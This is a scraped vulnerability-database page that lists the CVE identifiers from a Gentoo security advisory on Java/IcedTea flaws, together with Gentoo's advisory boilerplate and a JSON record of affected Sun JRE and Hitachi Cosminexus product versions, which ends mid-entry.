[ 1 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 2 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 3 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 4 ] CVE-2012-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498 [ 5 ] CVE-2012-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499 [ 6 ] CVE-2012-0500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500 [ 7 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 8 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 9 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 10 ] CVE-2012-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504 [ 11 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 12 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 13 ] CVE-2012-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507 [ 14 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 15 ] CVE-2012-1531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531 [ 16 ] CVE-2012-1532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532 [ 17 ] CVE-2012-1533 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533 [ 18 ] CVE-2012-1541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541 [ 19 ] CVE-2012-1682 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682 [ 20 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 21 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 22 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 23 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 24 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 25 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 26 ] CVE-2012-1721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721 [ 27 ] CVE-2012-1722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722 [ 28 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 29 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 30 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 31 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 32 ] CVE-2012-3136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136 [ 33 ] CVE-2012-3143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143 [ 34 ] CVE-2012-3159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159 [ 35 ] CVE-2012-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174 [ 36 ] CVE-2012-3213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213 [ 37 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 38 ] CVE-2012-3342 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342 [ 39 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 40 ] CVE-2012-4681 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681 [ 41 ] CVE-2012-5067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067 [ 42 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 43 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 44 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 45 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 46 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 47 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 48 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 49 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 50 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 51 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 52 ] CVE-2012-5079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079 [ 53 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 54 ] CVE-2012-5083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083 [ 55 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 56 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 57 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 58 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 59 ] CVE-2012-5088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088 [ 60 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 61 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 62 ] CVE-2013-0351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351 [ 63 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 64 ] CVE-2013-0402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402 [ 65 ] CVE-2013-0409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409 [ 66 ] CVE-2013-0419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419 [ 67 ] CVE-2013-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422 [ 68 ] CVE-2013-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423 [ 69 ] CVE-2013-0430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430 [ 70 ] CVE-2013-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437 [ 71 ] CVE-2013-0438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438 [ 72 ] CVE-2013-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445 [ 73 ] CVE-2013-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446 [ 74 ] CVE-2013-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448 [ 75 ] CVE-2013-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449 [ 76 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 77 ] CVE-2013-1473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473 [ 78 ] CVE-2013-1479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479 [ 79 ] CVE-2013-1481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481 [ 80 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 81 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 82 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 83 ] CVE-2013-1487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487 [ 84 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 85 ] CVE-2013-1491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491 [ 86 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 87 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 88 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 89 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 90 ] CVE-2013-1540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540 [ 91 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 92 ] CVE-2013-1558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558 [ 93 ] CVE-2013-1561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561 [ 94 ] CVE-2013-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563 [ 95 ] CVE-2013-1564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564 [ 96 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 97 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 98 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 99 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 100 ] CVE-2013-2394 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394 [ 101 ] CVE-2013-2400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400 [ 102 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 103 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 104 ] CVE-2013-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414 [ 105 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 106 ] CVE-2013-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416 [ 107 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 108 ] CVE-2013-2418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418 [ 109 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 110 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 111 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 112 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 113 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 114 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 115 ] CVE-2013-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425 [ 116 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 117 ] CVE-2013-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427 [ 118 ] CVE-2013-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428 [ 119 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 120 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 121 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 122 ] CVE-2013-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432 [ 123 ] CVE-2013-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433 [ 124 ] CVE-2013-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434 [ 125 ] CVE-2013-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435 [ 126 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 127 ] CVE-2013-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437 [ 128 ] CVE-2013-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438 [ 129 ] CVE-2013-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439 [ 130 ] CVE-2013-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440 [ 131 ] CVE-2013-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442 [ 132 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 133 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 134 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 135 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 136 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 137 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 138 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 139 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 140 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 141 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 142 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 143 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 144 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 145 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 146 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 147 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 148 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 149 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 150 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 151 ] CVE-2013-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462 [ 152 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 153 ] CVE-2013-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464 [ 154 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 155 ] CVE-2013-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466 [ 156 ] CVE-2013-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467 [ 157 ] CVE-2013-2468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468 [ 158 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 159 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 160 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 161 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 162 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 163 ] CVE-2013-3743 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743 [ 164 ] CVE-2013-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744 [ 165 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 166 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 167 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 168 ] CVE-2013-5775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775 [ 169 ] CVE-2013-5776 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5776 [ 170 ] CVE-2013-5777 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5777 [ 171 ] CVE-2013-5778 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5778 [ 172 ] CVE-2013-5780 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5780 [ 173 ] CVE-2013-5782 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5782 [ 174 ] CVE-2013-5783 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5783 [ 175 ] CVE-2013-5784 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5784 [ 176 ] CVE-2013-5787 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5787 [ 177 ] CVE-2013-5788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5788 [ 178 ] CVE-2013-5789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5789 [ 179 ] CVE-2013-5790 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5790 [ 180 ] CVE-2013-5797 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5797 [ 181 ] CVE-2013-5800 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5800 [ 182 ] CVE-2013-5801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5801 [ 183 ] CVE-2013-5802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5802 [ 184 ] CVE-2013-5803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5803 [ 185 ] CVE-2013-5804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5804 [ 186 ] CVE-2013-5805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5805 [ 187 ] CVE-2013-5806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5806 [ 188 ] CVE-2013-5809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5809 [ 189 ] CVE-2013-5810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5810 [ 190 ] CVE-2013-5812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5812 [ 191 ] CVE-2013-5814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5814 [ 192 ] CVE-2013-5817 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5817 [ 193 ] CVE-2013-5818 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5818 [ 194 ] CVE-2013-5819 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5819 [ 195 ] CVE-2013-5820 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5820 [ 196 ] CVE-2013-5823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5823 [ 197 ] CVE-2013-5824 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5824 [ 198 ] CVE-2013-5825 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5825 [ 199 ] CVE-2013-5829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5829 [ 200 ] CVE-2013-5830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5830 [ 201 ] CVE-2013-5831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5831 [ 202 ] CVE-2013-5832 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5832 [ 203 ] CVE-2013-5838 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5838 [ 204 ] CVE-2013-5840 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5840 [ 205 ] CVE-2013-5842 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5842 [ 206 ] CVE-2013-5843 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5843 [ 207 ] CVE-2013-5844 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5844 [ 208 ] CVE-2013-5846 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5846 [ 209 ] CVE-2013-5848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5848 [ 210 ] CVE-2013-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5849 [ 211 ] CVE-2013-5850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5850 [ 212 ] CVE-2013-5851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5851 [ 213 ] CVE-2013-5852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5852 [ 214 ] CVE-2013-5854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5854 [ 215 ] CVE-2013-5870 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5870 [ 216 ] CVE-2013-5878 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5878 [ 217 ] CVE-2013-5887 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5887 [ 218 ] CVE-2013-5888 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5888 [ 219 ] CVE-2013-5889 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5889 [ 220 ] CVE-2013-5893 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5893 [ 221 ] CVE-2013-5895 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5895 [ 222 ] CVE-2013-5896 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5896 [ 223 ] CVE-2013-5898 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5898 [ 224 ] CVE-2013-5899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5899 [ 225 ] CVE-2013-5902 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5902 [ 226 ] CVE-2013-5904 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5904 [ 227 ] CVE-2013-5905 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5905 [ 228 ] CVE-2013-5906 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5906 [ 229 ] CVE-2013-5907 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5907 [ 230 ] CVE-2013-5910 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5910 [ 231 ] CVE-2014-0368 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0368 [ 232 ] CVE-2014-0373 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0373 [ 233 ] CVE-2014-0375 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0375 [ 234 ] CVE-2014-0376 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0376 [ 235 ] CVE-2014-0382 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0382 [ 236 ] CVE-2014-0385 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0385 [ 237 ] CVE-2014-0387 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0387 [ 238 ] CVE-2014-0403 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0403 [ 239 ] CVE-2014-0408 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0408 [ 240 ] CVE-2014-0410 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0410 [ 241 ] CVE-2014-0411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0411 [ 242 ] CVE-2014-0415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0415 [ 243 ] CVE-2014-0416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0416 [ 244 ] CVE-2014-0417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0417 [ 245 ] CVE-2014-0418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0418 [ 246 ] CVE-2014-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0422 [ 247 ] CVE-2014-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0423 [ 248 ] CVE-2014-0424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0424 [ 249 ] CVE-2014-0428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0428
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201401-30.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . (CVE-2013-5803)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201310-0612", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "jre", "scope": "eq", "trust": 1.6, "vendor": "sun", "version": "1.5.0" }, { "model": "ucosminexus client", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-50" }, { "model": "ucosminexus application server enterprise", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus client version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "606-50" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "06-70" }, { "model": "cosminexus developer standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus primary server base", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "06-00" }, { "model": "cosminexus application server enterprise version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer professional version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus application server standard version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus developer version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus developer light version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "606-00" }, { "model": "cosminexus studio version", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "505-05" }, { "model": "cosminexus client version", "scope": 